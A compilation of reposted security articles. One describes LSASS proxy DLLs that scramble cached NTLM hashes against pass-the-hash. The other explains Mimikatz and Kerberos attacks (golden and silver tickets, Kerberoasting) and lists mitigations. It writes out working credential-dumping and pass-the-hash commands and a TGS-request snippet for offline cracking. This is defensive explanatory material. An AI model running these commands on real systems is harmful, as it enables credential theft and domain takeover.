The flow of control through MSV1_0 and Kerberos isn't really documented much (not at all officially), so I had to start mostly from scratch in order to trace where the credentials passed and determine the easiest locations to grab them. The key function appeared to be LsaApLogonUserEx2 in both Kerberos and MSV1_0. This is where much of the original work is done and where the credentials are initially returned from. Once the call is made into Kerberos at this function, the credentials are gathered and returned back out to LSASS. Supplemental credentials gathered at this point will be sent to the appropriate security packages registered to handle them (such as MSV1_0 for NTLM) via the SpAddCredentials function. There they are processed by their respective security packages and, at a point near the end, are fired off to LSASS via the AddCredential function. Note: the order of those two may be reversed, as it has been quite some time since I did this. This gave me several points in the chain where I was able to intercept and modify the hash in order to make it unusable before it was cached.
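The proxy pattern Koby Kahane describes boils down to saving the original package's function pointer out of the dispatch table and substituting a wrapper of your own. The sketch below is a toy model in plain C under loud assumptions: the table and credential types are simplified stand-ins I made up, not the real SECPKG_FUNCTION_TABLE from ntsecpkg.h.

```c
/* Stand-ins for the real LSASS types (SECPKG_FUNCTION_TABLE etc.). */
typedef struct {
    unsigned char nt_hash[16];
} toy_cred;

typedef int (*add_credentials_fn)(toy_cred *cred);

typedef struct {
    add_credentials_fn SpAddCredentials;   /* the slot we proxy */
} toy_function_table;

/* Saved pointer to the genuine package's implementation. */
static add_credentials_fn real_add_credentials;
static int proxy_hits;                     /* for demonstration only */

static int proxy_add_credentials(toy_cred *cred)
{
    proxy_hits++;
    /* ...inspect or scramble cred here before handing off... */
    return real_add_credentials(cred);     /* forward to the real package */
}

/* Done while relaying the function table during initialization:
   remember the original pointer, then overwrite the slot. */
static void install_proxy(toy_function_table *table)
{
    real_add_credentials = table->SpAddCredentials;
    table->SpAddCredentials = proxy_add_credentials;
}

/* Genuine package function for the demo; always succeeds. */
static int genuine_add_credentials(toy_cred *cred) { (void)cred; return 0; }

/* Returns how many times the proxy ran for one call through the table. */
static int proxy_demo(void)
{
    toy_function_table t = { genuine_add_credentials };
    toy_cred c = { {0} };
    proxy_hits = 0;
    install_proxy(&t);
    if (t.SpAddCredentials(&c) != 0)       /* caller is none the wiser */
        return -1;
    return proxy_hits;
}
```

A caller that goes through the table now transparently hits proxy_add_credentials first; applying the same trick to LSASS's own AddCredential slot gives the failsafe interception point the article mentions.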
Building and Using the Proxies

After a colleague and I combed through the information, I decided that I could create a custom proxy to keep LSASS from caching the NTLM hashes that Kerberos added as supplemental credentials. There were two places of interest where I could scramble the incoming NTLM hash before it was stored: I could proxy the Kerberos module and scramble the NTLM hash before it was sent back to LSASS and into the MSV1_0 module, or I could catch it as it was coming into MSV1_0 from Kerberos (as well as from any other source). I decided that I would create a proxy for each 'just in case' and then choose one of them after testing, as I felt that the less I messed around with Microsoft's subsystems, the less chance something would go wrong. I created two proxies, one for the SSP/AP msv1_0.dll and another for the SSP kerberos.dll. I really needed to handle two different sets of calls. The first set was through the recommended use of the SpLsaModeInitialize and SpUserModeInitialize functions as described by Koby and the MSDN documentation, requiring you to create and populate the function tables accordingly, replacing any proxied functions with your own. The second method was exporting and proxying the functions available in the original DLLs (such as through jmp tables initialized upon load) for any application that may bypass the tables entirely (don't always count on other programs to do things the way they are supposed to).

MSV1_0

For the MSV1_0 proxy, the SpAddCredentialsPackage function needed to be proxied by saving the original pointer and placing a pointer to the new one into the returned function table in its place. This is where the incoming NTLM credentials would be intercepted and modified before being passed on to the real MSV1_0 (via its SpAddCredentialsPackage) and stored/cached.
In the new function, I wanted to be selective about which logon types had their credentials scrambled, as I still wanted local services to be able to start up and authenticate with the local system. To do this, I checked the incoming SECURITY_LOGON_TYPE parameter for the service type (or any other type that you want to allow to cache NTLM credentials - preferably only local accounts) and simply passed those through to the original function and returned. For everything else, I grabbed the PSECPKG_SUPPLEMENTAL_CRED structure and verified that the package name was "NTLM". If this was the case, I scrambled the LmPassword and NtPassword parts of that structure. Once that was done, I called the original function, passing the scrambled supplemental credentials to the real MSV1_0. MSV1_0 takes them, and LSASS caches the now-useless hash in its memory.

KERBEROS

For the Kerberos proxy (and the MSV1_0 proxy, if you wish to also handle the hash coming from an interactive login at an earlier point in the process), I proxied and modified LsaApLogonUserEx2. In this case, I called the original as normal and intercepted the credentials being returned from that call. At that point, I used the same logic to check and scramble the supplemental (NTLM) credentials before returning. One other place the credentials can be intercepted is just prior to going into LSASS itself. This requires intercepting the proxied package's call to LSASS's AddCredential function, which is passed in via a function table during SpInitialize. In this case, the AddCredential pointer is replaced by a pointer to a new function before passing the table to the original package, such that when the original package calls that function to add credentials, it goes through the proxied function first. In the proxied function, the credentials need to be unwrapped via LsaUnprotectMemory, scrambled, and then re-wrapped via LsaProtectMemory before being passed into LSASS.
This should not be necessary, but can be used as a failsafe.

Using the Proxies

After the proxies were completed, they needed to be put to use. There are two methods of doing this, with pros and cons to each. First, one can simply rename the DLL being proxied to something else while using the real name (msv1_0.dll or kerberos.dll) for the proxy. Second, the original DLLs can keep their names, using different names for the proxies while changing the registry entries for the Security Packages and/or Authentication Packages. With the former, the problem one may run into is a patch/update intended for Microsoft's DLLs overwriting the proxies. With the latter, someone with access to view those registry keys may notice the names are not what they are supposed to be.

Choosing a Proxy

In the end I chose to use the MSV1_0 proxy over the Kerberos proxy in order to catch hashes that may come from other packages/programs. When a set of credentials comes into LSASS, it is sent to the appropriate package for handling; in the case of NTLM credentials, they are sent to the MSV1_0 package. You could easily switch to using the Kerberos proxy, catching and scrubbing the supplemental credentials after returning from kerberos.dll in LsaApLogonUserEx2(). This, however, will not catch any NTLM hashes coming from outside of Kerberos. Alternatively, one could use both proxies, as opposed to the minimum required to catch most cases.

Summary

With this technique, a good majority of automated/default Pass-the-Hash attacks can be mitigated. While there is still a hash cached/stored in memory by LSASS, that hash has been scrambled and is therefore useless. If your systems use NTLM authentication, then SSO will probably no longer work, resulting in endless login prompts when attempting to use remote resources. It's really only useful for networks that want to force Kerberos at the expense of legacy compatibility.
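The selection-and-scramble step described for the MSV1_0 proxy can be sketched in portable C. Everything below is a toy stand-in: the enum values and the credential layout only loosely mirror SECURITY_LOGON_TYPE and SECPKG_SUPPLEMENTAL_CRED, and the scramble function is a fixed pattern rather than the real thing.

```c
#include <stddef.h>

/* Toy stand-ins for SECURITY_LOGON_TYPE and the NTLM supplemental
   credential layout; values and fields are illustrative, not the real ones. */
enum toy_logon_type { TOY_INTERACTIVE = 2, TOY_NETWORK = 3, TOY_SERVICE = 5 };

typedef struct {
    unsigned char lm_password[16];   /* LM hash */
    unsigned char nt_password[16];   /* NT hash */
} toy_ntlm_cred;

/* Overwrite the hash so it can never match a real credential.
   A real implementation might prefer a CSPRNG to a fixed pattern. */
static void scramble(unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= (unsigned char)(0xA5 + 17 * i);
}

/* The filter: service logons keep a usable hash so local services can
   still authenticate; everything else is scrambled before the real
   MSV1_0 caches it. Returns 1 if scrambled, 0 if passed through. */
static int filter_credentials(enum toy_logon_type type, toy_ntlm_cred *cred)
{
    if (type == TOY_SERVICE)
        return 0;                    /* pass through untouched */
    scramble(cred->lm_password, sizeof cred->lm_password);
    scramble(cred->nt_password, sizeof cred->nt_password);
    return 1;                        /* LSASS will cache a useless hash */
}

/* Demo helper: run the filter over an all-zero credential. */
static int filter_demo(enum toy_logon_type type)
{
    toy_ntlm_cred c = { {0}, {0} };
    return filter_credentials(type, &c);
}
```

The real proxy does exactly this shape of work inside its SpAddCredentialsPackage wrapper before forwarding to the genuine msv1_0.dll.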
Also, I need to reiterate that this does not solve the whole problem. There are other issues, which I will not go into, that my team had to solve, such as protecting the proxies from attack. A sophisticated attacker has several methods by which this can be easily defeated if it is not protected. The proxies do absolutely nothing to mitigate an attacker intercepting credentials in other ways, such as across the network or via Pass-the-Ticket. It does help narrow the available target a little bit, and every little bit helps. One final note to keep in mind for anyone following in these footsteps: mucking around with LSASS can get pretty messy. If you get something wrong, you will not know until you've already told LSASS to load your modules, in which case a crash of LSASS (assuming you don't blue screen) can prevent you from logging into that system again normally. I would advise that you test your development thoroughly using a VM, and once you do try it on a live system, be prepared to revert, use a boot disc, or mount the hard drive from another system to fix it. Take heed of that if you are deploying it across a domain. I hope someone finds this useful. It's primarily targeted towards Windows XP and Windows 7, but may continue to apply to Windows 8 as well, depending on how Microsoft works the Pass-the-Hash issue.

-=[Kevin]=-

Addendum A - DeleteSecurityPackage

During my research and development relating to using SSP/APs and SSPs, I came across an issue with DeleteSecurityPackage that threw me for a loop. I was working on a system that would remove unauthorized security packages on a live system. Research led me to this function in the Windows security API - a function documented on MSDN as: "Deletes a security support provider from the list of providers supported by Microsoft Negotiate." Attempting to use this function, however, failed. Upon use, the return value from the function was 0x80090302 (SEC_E_UNSUPPORTED_FUNCTION).
That didn't seem right, since the function was documented and searching the internet turned up nothing from anyone else saying otherwise. After double-checking and ensuring that there was no error on my part, I broke out my trusty IDA Pro and decided to trace the function back to its roots. After following several proxied jumps I got to the source function, DeleteSecurityPackageW (DeleteSecurityPackageA also redirects to this function). Here is what I found: the function is a stub that simply returns SEC_E_UNSUPPORTED_FUNCTION. Apparently either Microsoft forgot to implement the function, or, more likely, discovered that it was a pretty hard problem to tackle without making assumptions for the end user and decided not to implement it (while leaving the documentation online). To give them some credit, it does seem like it would be a difficult problem - when you remove a security package currently in use, what is your default policy for dealing with accounts logged in using that package? Do you kick them, keep them logged in (if that's possible), prevent removal until they log out? Maybe they decided it was better to just avoid the question altogether. It's not entirely bad that it's not implemented. It means that in order to remove a security package (such as to replace it), a reboot is typically going to be required, as LSASS will force one if you try to remove it any other way. Who knows? Anyway, I e-mailed MSDN support and posted a notice on the MSDN documentation page, but never got a response... so there it is if anyone else is having an issue using it.

Addendum B - EnumerateSecurityPackages

Another issue that I came across while working with the Windows security APIs relating to LSASS was with EnumerateSecurityPackages. I needed this function in order to monitor which security packages were loaded and detect any that were unauthorized. Initially, when I tested this function manually, everything was working fine.
Each time I ran my test, it showed me all of the currently loaded security packages, including any that I manually loaded after boot using AddSecurityPackage. Once I automated the process to periodically call the function, I started seeing problems. What would happen is that when a process first called this function, it would populate a list with all of the security packages it saw loaded; subsequent calls would return that very same list. I double-checked and was using FreeContextBuffer just as the documentation specified, but nothing changed. This was a rather annoying issue that I had to somehow overcome. My solution (and my recommended solution, if it has not been fixed yet) was to embed a second binary into the parent binary, which would be dropped and spawned by the parent each time the list needed to be checked. The output of the spawn is easily wrapped and captured by the parent. The spawn can either be a temporary drop or a permanent drop executed periodically by the parent monitoring system. Since only the parent is constantly running, the spawn only needs to make that call and grab the list once per execution. Another e-mail and another post to the documentation on MSDN, without a response. It may or may not have been fixed by now, but just in case, here's one workaround.

References

- Koby Kahane, 2008: http://kobyk.wordpress.com/2008/08/30/implementing-an-lsa-proxy-authentication-package/
- SANS Institute, "Pass-the-hash attacks: Tools and Mitigation", Bashar Ewaida, 2010
- Kerberos Working Group, Johansson, 2009
- Core Labs, Hernan Ochoa
- ...and my former team at MacAulay-Brown

EDITS: 20140327 - Added the definition of mitigation to the top in order to prevent any misunderstandings. Added the twitter handle for @passthehash in the introduction.

Posted by Kevin Keathley at 5:44 AM

Sursa: http://cybernigma.blogspot.ro/2014/03/using-sspap-lsass-proxy-to-mitigate.html
-
Mimikatz and Active Directory Kerberos Attacks

by Sean Metcalf

Mimikatz is the latest, and one of the best, tools for gathering credential data from Windows systems. In fact, I consider Mimikatz to be the "swiss army knife" of Windows credentials - the one tool that can do everything. Since the author of Mimikatz, Benjamin Delpy, is French, most of the resources describing Mimikatz usage are in French, at least on his blog. The Mimikatz GitHub repository is in English and includes useful information on command usage. Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a proof of concept). There are two optional components that provide additional features: mimidrv (a driver to interact with the Windows kernel) and mimilib (AppLocker bypass, auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM rights, and often debug rights, in order to perform certain actions and interact with the LSASS process (depending on the action requested). After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. This is meant to facilitate single sign-on (SSO), ensuring a user isn't prompted each time resource access is requested. The credential data may include NTLM password hashes, LM password hashes (if the password is <15 characters), and even clear-text passwords (to support WDigest and SSP authentication, among others). You can prevent a Windows computer from creating the LM hash in the local computer SAM database (and the AD database), but this doesn't prevent the system from generating the LM hash in memory.
The majority of Mimikatz functionality is available in PowerSploit (a PowerShell post-exploitation framework) through the "Invoke-Mimikatz" PowerShell script, which "leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the mimikatz binary to disk." Mimikatz functionality supported by Invoke-Mimikatz is noted below. Benjamin Delpy posted an Excel chart on OneDrive that shows what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2, which have enhanced protection mechanisms reducing the amount and type of credentials kept in memory. One of the biggest security concerns with Windows today is "Pass the Hash." Simply stated, Windows performs a one-way hash function on the user's password, and the result is referred to as a "hash." The one-way hash algorithm changes the password in expected ways given the input data (the password), with the result being scrambled data that can't be reverted back to the original input data, the password. Hashing a password is like putting a steak through a meat grinder to make ground beef - the ground beef can never be put back together to be the same steak again. Pass the Hash has many variants, from Pass the Ticket to Over-Pass the Hash (aka pass the key). The following quote is a Google Translate English translation of the Mimikatz website (which is in French):
"Contrary to what could easily be imagined, Windows does not use the password of the user as a shared secret, but non-reversible derivatives: LM hash, NTLM, DES keys, AES... According to the protocol, the secret and the algorithms used are different:"

Protocol | Algorithm | Secret used
---------|-----------|------------
LM       | DES-ECB   | LM hash
NTLMv1   | DES-ECB   | NT hash
NTLMv2   | HMAC-MD5  | NT hash

Mimikatz OS support:
- Windows XP
- Windows Vista
- Windows 7
- Windows 8
- Windows Server 2003
- Windows Server 2008 / 2008 R2
- Windows Server 2012 / 2012 R2
- Windows 10 (beta support)

Windows encrypts most credentials held in memory (LSASS), but it does so with reversible encryption, so the clear text can be recovered: credentials are encrypted with LsaProtectMemory and decrypted with LsaUnprotectMemory.
- NT5 encryption types: RC4 & DESx
- NT6 encryption types: 3DES & AES

Mimikatz capabilities:
- Dump credentials from LSASS (Windows Local Security Account database) [sekurlsa module]
  - MSV1.0: hashes & keys (dpapi)
  - Kerberos password, ekeys, tickets, & PIN
  - TsPkg (password)
  - WDigest (clear-text password)
  - LiveSSP (clear-text password)
  - SSP (clear-text password)
- Generate Kerberos Golden Tickets (Kerberos TGT logon token ticket attack)
- Generate Kerberos Silver Tickets (Kerberos TGS service ticket attack)
- Export certificates and keys (even those not normally exportable)
- Dump cached credentials
- Stop event monitoring
- Bypass Microsoft AppLocker / Software Restriction Policies
- Patch Terminal Server
- Basic GPO bypass

Items in bold denote functionality provided by the PowerSploit Invoke-Mimikatz module with built-in parameters; other mimikatz commands may work using the command parameter.

Mimikatz Command Overview:

The primary command components are sekurlsa, kerberos, crypto, vault, and lsadump.
Sekurlsa interacts with the LSASS process in memory to gather credential data and provides enhanced capability over kerberos. The Mimikatz kerberos command set enables modification of Kerberos tickets and interacts with the official Microsoft Kerberos API. This is the command that creates Golden Tickets. Pass the Ticket is also possible with this command, since it can inject Kerberos ticket(s) (TGT or TGS) into the current session. External Kerberos tools may be used for session injection, but they must follow the Kerberos credential format (KRB_CRED). Mimikatz kerberos also enables the creation of Silver Tickets, which are Kerberos tickets (TGT or TGS) with arbitrary data enabling AD user/group impersonation. The key required for ticket creation depends on the type of ticket being generated:

- Golden Tickets require the KRBTGT account NTLM password hash.
- Silver Tickets require the computer or service account's NTLM password hash.

Crypto enables export of certificates on the system that are not marked exportable, since it bypasses the standard export process. Vault enables dumping data from the Windows vault. Lsadump enables dumping credential data from the Security Account Manager (SAM) database, which contains the NTLM (and sometimes LM) hash, supports online and offline mode, and can also dump credential data from the LSASS process in memory. Lsadump can also be used to dump cached credentials. In a Windows domain, credentials are cached (up to 10) in case a Domain Controller is unavailable for authentication; however, these credentials are stored on the computer, in the registry at HKEY_LOCAL_MACHINE\SECURITY\Cache (accessible to SYSTEM). The entries are encrypted symmetrically, but they contain some information about the user as well as enough material to verify authentication against the hash. Further down is a more detailed list of mimikatz command functionality.
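The pass-the-hash weakness that runs through all of the attacks below can be reduced to a few lines of C. This is a toy model under loud assumptions: the FNV-1a function stands in for the NTLM hash, and the "server" and "client" are plain functions, not the real protocol - the point is only that the stored secret is compared hash-to-hash, so a stolen hash is a password-equivalent.

```c
#include <stdint.h>

/* Toy one-way function (FNV-1a) standing in for the NTLM hash. */
static uint64_t toy_hash(const char *password)
{
    uint64_t h = 1469598103934665603ULL;        /* FNV offset basis */
    for (; *password; password++) {
        h ^= (unsigned char)*password;
        h *= 1099511628211ULL;                  /* FNV prime */
    }
    return h;
}

/* The "server" only ever compares hashes, never the password itself. */
static int server_authenticate(uint64_t stored_hash, uint64_t presented_hash)
{
    return stored_hash == presented_hash;
}

/* Legitimate client: hashes the typed password, then presents the hash. */
static int login_with_password(uint64_t stored, const char *password)
{
    return server_authenticate(stored, toy_hash(password));
}

/* Attacker: skips the password entirely and presents a stolen hash -
   indistinguishable from the legitimate path above. */
static int login_with_stolen_hash(uint64_t stored, uint64_t stolen)
{
    return server_authenticate(stored, stolen);
}
```

Cracking the hash back to the password is never needed; possession of the hash is enough, which is why scrambling or removing cached hashes matters so much.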
Common Kerberos Attacks

Pass the Hash

On Windows, a user provides the userid and password, and the password is hashed, creating the password hash. When the user on one Windows system wants to access another, the user's password hash is sent (passed) to the destination resource to authenticate. This means there is no need to crack the user's password, since the user's password hash is all that's needed to gain access. "Contrary to what could easily be imagined, Windows does not use the password of the user as a shared secret, but non-reversible derivatives: LM hash, NTLM, DES keys, AES..."

Pass the Ticket (Google Translation)

Extract an existing, valid Kerberos ticket from one machine and pass it to another one to gain access to resources as that user.

Over-Pass the Hash (aka Pass the Key) (Google Translation)

Use the NTLM hash to obtain a valid user Kerberos ticket request. The user key (the NTLM hash when using RC4) is used to encrypt the pre-authentication and first data requests. The following quote is a Google Translate English translation of the Mimikatz website (which is in French): "Authentication via Kerberos is a tad different. The client encrypts a timestamp with its user secret, possibly with realm parameters and an iteration count sent from the server. If the secret is correct, the server can decrypt the timestamp (and in passing verify that the clocks are not too far out of sync)."

Protocol | Secret (key) used
---------|---------------------------------
Kerberos | DES, RC4 (= NT hash!), AES128, AES256

Yes, the RC4 key type, available and enabled by default from XP to 8.1, is our NT hash!

Kerberos Golden Ticket (Google Translation)

The Kerberos Golden Ticket is a valid TGT Kerberos ticket, since it is encrypted/signed by the domain Kerberos account (KRBTGT).
The TGT is only used to prove to the KDC service on the Domain Controller that the user was authenticated by another Domain Controller. The fact that the TGT is encrypted by the KRBTGT password hash and can be decrypted by any KDC service in the domain proves it is valid.

Golden Ticket requirements:
- Domain name [AD PowerShell module: (Get-ADDomain).DNSRoot]
- Domain SID [AD PowerShell module: (Get-ADDomain).DomainSID.Value]
- Domain KRBTGT account NTLM password hash
- UserID for impersonation

The Domain Controller KDC service doesn't perform PAC validation until the TGT is more than 20 minutes old, which means the attacker can make the ticket state that the user with the TGT is a member of any group in Active Directory, and the DC accepts it (until the 21st minute); the PAC data (group membership) is placed in the TGS without validation. Microsoft's MS-KILE specification (section 5.1.3): "Kerberos V5 does not provide account revocation checking for TGS requests, which allows TGT renewals and service tickets to be issued as long as the TGT is valid even if the account has been revoked. KILE provides a check account policy (section 3.3.5.7.1) that limits the exposure to a shorter time. KILE KDCs in the account domain are required to check accounts when the TGT is older than 20 minutes. This limits the period that a client can get a ticket with a revoked account while limiting the performance cost for AD queries." Since the domain Kerberos policy is set on the ticket when it is generated by the KDC service on the Domain Controller, systems trust the ticket's stated validity when it is presented. This means that even if the domain policy states a Kerberos logon ticket (TGT) is only valid for 10 hours, if the ticket states it is valid for 10 years, it is accepted as such. The KRBTGT account password is never changed*, so the attacker can create Golden Tickets until the KRBTGT password is changed (twice).
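The trust problem just described - resource checks believe whatever lifetime a validly "signed" ticket carries, rather than re-checking domain policy - can be modeled in a few lines of portable C. The "signature" here is a toy keyed checksum I invented, not real Kerberos cryptography, and the KRBTGT key is just a 64-bit number.

```c
#include <stdint.h>

/* Toy ticket: the lifetime is embedded in the ticket and covered by a
   keyed checksum standing in for encryption with the KRBTGT hash. */
typedef struct {
    int64_t  expires;   /* epoch seconds the ticket claims validity until */
    uint64_t mac;       /* toy "signature" over expires, keyed by krbtgt_key */
} toy_tgt;

static uint64_t toy_mac(uint64_t krbtgt_key, int64_t expires)
{
    uint64_t h = krbtgt_key ^ 1469598103934665603ULL;  /* FNV-style mix */
    for (int i = 0; i < 8; i++) {
        h ^= (uint64_t)(expires >> (8 * i)) & 0xFF;
        h *= 1099511628211ULL;
    }
    return h;
}

/* What the KDC does: stamp the lifetime in and "sign" it. */
static toy_tgt issue_tgt(uint64_t krbtgt_key, int64_t expires)
{
    toy_tgt t = { expires, toy_mac(krbtgt_key, expires) };
    return t;
}

/* What the verifier does: check the signature, then believe the ticket's
   own expiry field - domain policy is never consulted again. */
static int accept_tgt(uint64_t krbtgt_key, const toy_tgt *t, int64_t now)
{
    return t->mac == toy_mac(krbtgt_key, t->expires) && t->expires > now;
}

/* An attacker holding the KRBTGT key forges a 10-year ticket exactly the
   way the KDC issues a 10-hour one; the verifier cannot tell them apart. */
static int golden_ticket_demo(void)
{
    const uint64_t krbtgt_key = 0x1122334455667788ULL;  /* "stolen" key */
    const int64_t now = 1700000000;
    toy_tgt golden = issue_tgt(krbtgt_key, now + 10LL * 365 * 24 * 3600);
    return accept_tgt(krbtgt_key, &golden, now);
}

/* Tampering without the key breaks the checksum and is rejected. */
static int tampered_demo(void)
{
    const uint64_t krbtgt_key = 0x1122334455667788ULL;
    const int64_t now = 1700000000;
    toy_tgt t = issue_tgt(krbtgt_key, now + 3600);
    t.expires += 1000;               /* forgery without the key */
    return accept_tgt(krbtgt_key, &t, now);
}
```

The asymmetry is the whole attack: validity flows from knowing the key, not from the KDC's records, so whoever holds the KRBTGT hash is a ticket-issuing authority.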
Note that a Golden Ticket created to impersonate a user persists even if the impersonated user changes their password. Crafting this TGT requires the Active Directory domain's KRBTGT password hash (typically dumped from a Domain Controller). The KRBTGT NTLM hash can be used to generate a valid TGT (using RC4) impersonating any user, with access to any resource in Active Directory. The Golden Ticket (TGT) can be generated and used on any machine, even one that is not domain-joined, and the created TGT can be used without requiring Debug rights.

Mitigation:
* Limit Domain Admins from logging on to any computers other than Domain Controllers and a handful of admin servers (and don't let other admins log on to those servers); delegate all other rights to custom admin groups. This greatly reduces an attacker's ability to gain access to a Domain Controller's Active Directory database. If the attacker can't access the AD database (the ntds.dit file), they can't get the KRBTGT account NTLM password hash.
* Configuring Active Directory Kerberos to only allow AES may prevent Golden Tickets from being created.
* Another mitigation option is Microsoft KB2871997, which back-ports some of the enhanced security in Windows 8.1 and Windows 2012 R2.

Kerberos Silver Ticket
The Kerberos Silver Ticket is a valid Ticket Granting Service (TGS) Kerberos ticket, since it is encrypted/signed by the service account configured with a Service Principal Name for each server the Kerberos-authenticating service runs on. While a Golden Ticket is encrypted/signed with the KRBTGT account, a Silver Ticket is encrypted/signed by the service account (the computer account credential extracted from the computer's local SAM, or a service account credential). We know from the Golden Ticket attack (described above) that the PAC isn't validated for TGTs until they are older than 20 minutes.
Most services don't validate the PAC (by sending the TGS to the Domain Controller for PAC validation), so a valid TGS generated with the service account password hash can include a PAC that is entirely fictitious, even claiming the user is a Domain Admin, without challenge or correction. Since service tickets are identical in format to TGTs, albeit with a different service name, all you need to do is specify a different service name and use the RC4 key (NTLM hash) of the account password (either the computer account for default services, or the actual service account), and you can now issue service tickets for the requested service.

Note: You can also use the AES keys, if you happen to have them instead of the NTLM hash, and it will still work.

It is worth noting that services like MSSQL, SharePoint, etc. will only allow you to play with those services. The computer account, however, allows access to CIFS, service creation, and a whole host of other activities on the targeted computer. You can leverage the computer account into a shell with PsExec and you will be running as SYSTEM on that particular computer. Lateral movement is then a matter of doing whatever you need to do from there.
http://passing-the-hash.blogspot.com/2014/09/pac-validation-20-minute-rule-and.html

Service Account Password Cracking by Attacking the Kerberos Session Ticket (TGS)
NOTE: This attack does NOT require hacking tools on the network, since the cracking can be performed offline. The Kerberos session ticket (TGS) has a component that is encrypted with the password hash of the service (either a computer account or a service account). The TGS for the service is generated and delivered to the user after the user's TGT is presented to the KDC service on the Domain Controller. Since the service account's password hash is used to encrypt the server component, it is possible to request the service's TGS and perform an offline password attack.
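The offline attack reduces to a dictionary loop: derive a candidate key from each guessed password and test it against the captured TGS blob. The sketch below models this with HMAC-MD5 as a stand-in integrity check (the real attack derives an RC4-HMAC key from the MD4 NT hash of the password and verifies the Kerberos checksum; `derive_key`, the demo ticket blob, and the wordlist here are all illustrative):

```python
import hmac
import hashlib

def derive_key(password: str) -> bytes:
    # Stand-in key derivation; real Kerberoasting uses MD4(UTF-16LE(password)).
    return hashlib.sha256(password.encode("utf-16-le")).digest()

def checksum(key: bytes, blob: bytes) -> bytes:
    # Stand-in for the RC4-HMAC Kerberos checksum over the ticket data.
    return hmac.new(key, blob, hashlib.md5).digest()

# Simulate a captured service ticket protected by the service account password.
service_password = "Summer2014!"
ticket_data = b"enc-part-of-TGS"
captured_mac = checksum(derive_key(service_password), ticket_data)

# Offline, with no further network traffic: try candidates until one matches.
wordlist = ["password", "P@ssw0rd", "Summer2014!", "letmein"]
cracked = next((w for w in wordlist
                if checksum(derive_key(w), ticket_data) == captured_mac), None)
assert cracked == "Summer2014!"
```

Because the only verifier is the captured blob itself, the loop generates zero network traffic and no failed-logon events, which is why long service account passwords are the mitigation rather than lockout policies.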
Only normal Kerberos traffic is observed on the wire: the TGT is delivered to the Domain Controller along with a TGS request and response. At this point, no further network traffic is required. Service accounts typically have weak passwords and are rarely changed, making them excellent targets. Computer account passwords are changed about every 30 days and are extremely complex, making them virtually uncrackable. Finding interesting service accounts is as simple as sending a Service Principal Name query to the Global Catalog. Service accounts often have elevated rights in Active Directory, and since only a Kerberos service ticket (TGS) is required to attack the service account's password (the TGS can be saved to another system and the password cracked there), this is a difficult attack to stop.

Mitigation: Ensure all service accounts have long (>25 characters), complex passwords and only have the exact rights required (follow the principle of least privilege).

Tim Medin (@timmedin) describes this attack in his "Attacking Microsoft Kerberos: Kicking the Guard Dog of Hades" presentation at DerbyCon 2014 [slides: https://www.dropbox.com/s/1j6v6zbtsdg1kam/Kerberoast.pdf?dl=0]. In that presentation, Tim Medin provided PowerShell code examples for requesting a TGS. I have modified it slightly to add the $SPN variable:

$SPN = "HTTP/sharepoint.adsecurity.org"
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "$SPN"

Pass the Cache (*nix systems)
Linux/Unix systems (including Mac OS X) store Kerberos credentials in a cache file. As of 11/23/2014, Mimikatz supports extracting the credential data for passing to Active Directory in a manner similar to Pass the Hash / Pass the Ticket.
Mimikatz Commands:

* logonpasswords: mimikatz # sekurlsa::logonpasswords
Extracts passwords in memory.
* pth (pass the hash): mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
A fake identity is created and the fake identity's NTLM hash is replaced with the real one. "ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable)." "AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash."
* ptt (pass the ticket): mimikatz # kerberos::ptt
Enables Kerberos ticket (TGT or TGS) injection into the current session.
* tickets: mimikatz # sekurlsa::tickets /export
Identifies all session Kerberos tickets and lists/exports them. sekurlsa pulls the Kerberos data from memory and can access all user session tickets on the computer.
* ekeys: mimikatz # sekurlsa::ekeys
Extracts the Kerberos ekeys from memory. Enables theft of a user account until the password is changed (which may be never for a smartcard/PKI user).
* dpapi: mimikatz # sekurlsa::dpapi
* minidump: mimikatz # sekurlsa::minidump lsass.dmp
Performs a minidump of the LSASS process and extracts credential data from lsass.dmp. A minidump can be saved off the computer for credential extraction later, but the major version of Windows must match (you can't open a dump file from Windows 2012 on a Windows 2008 system).
* kerberos: mimikatz # sekurlsa::kerberos
Extracts the smartcard/PIV PIN from memory (cached in LSASS when using a smartcard).
* debug: mimikatz # privilege::debug
Sets debug mode for the current mimikatz session, enabling LSASS access.
* lsadump cache (requires token::elevate to become SYSTEM): mimikatz # lsadump::cache
Dumps cached Windows domain credentials from HKEY_LOCAL_MACHINE\SECURITY\Cache (accessible by SYSTEM).
References:
* Benjamin Delpy's blog (Google Translate English version)
* Mimikatz GitHub repository
* Mimikatz GitHub wiki
* Mimikatz 2 presentation slides (Benjamin Delpy, July 2014)
* All Mimikatz presentation resources on blog.gentilkiwi.com
* Excel chart on OneDrive showing what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2, which have enhanced protection mechanisms
* PAC validation issue (aka the Silver Ticket) description from the Passing the Hash blog

Source: http://adsecurity.org/?p=556
-
Pass-the-hash attacks: Tools and Mitigation

GIAC (GCIH) Gold Certification
Author: Bashar Ewaida, bashar9090@live.com
Advisor: Kristof Boeynaems
Accepted: January 21st 2010

Abstract
Although pass-the-hash attacks have been around for a little over thirteen years, knowledge of their existence is still poor. This paper tries to fill a gap in the knowledge of this attack through the testing of the freely available tools that facilitate the attack. While other papers and resources focus primarily on running the tools and sometimes comparing them, this paper offers an in-depth, systematic comparison of the tools across the various Windows platforms, including AV detection rates. It also provides extensive advice to mitigate pass-the-hash attacks and discusses the pros and cons of some of the approaches used in mitigating the attack.

Copyright SANS Institute. Author retains full rights.

Download: https://www.sans.org/reading-room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation-33283
-
Reducing the Effectiveness of Pass-the-Hash
National Security Agency/Central Security Service
Information Assurance Directorate

Contents
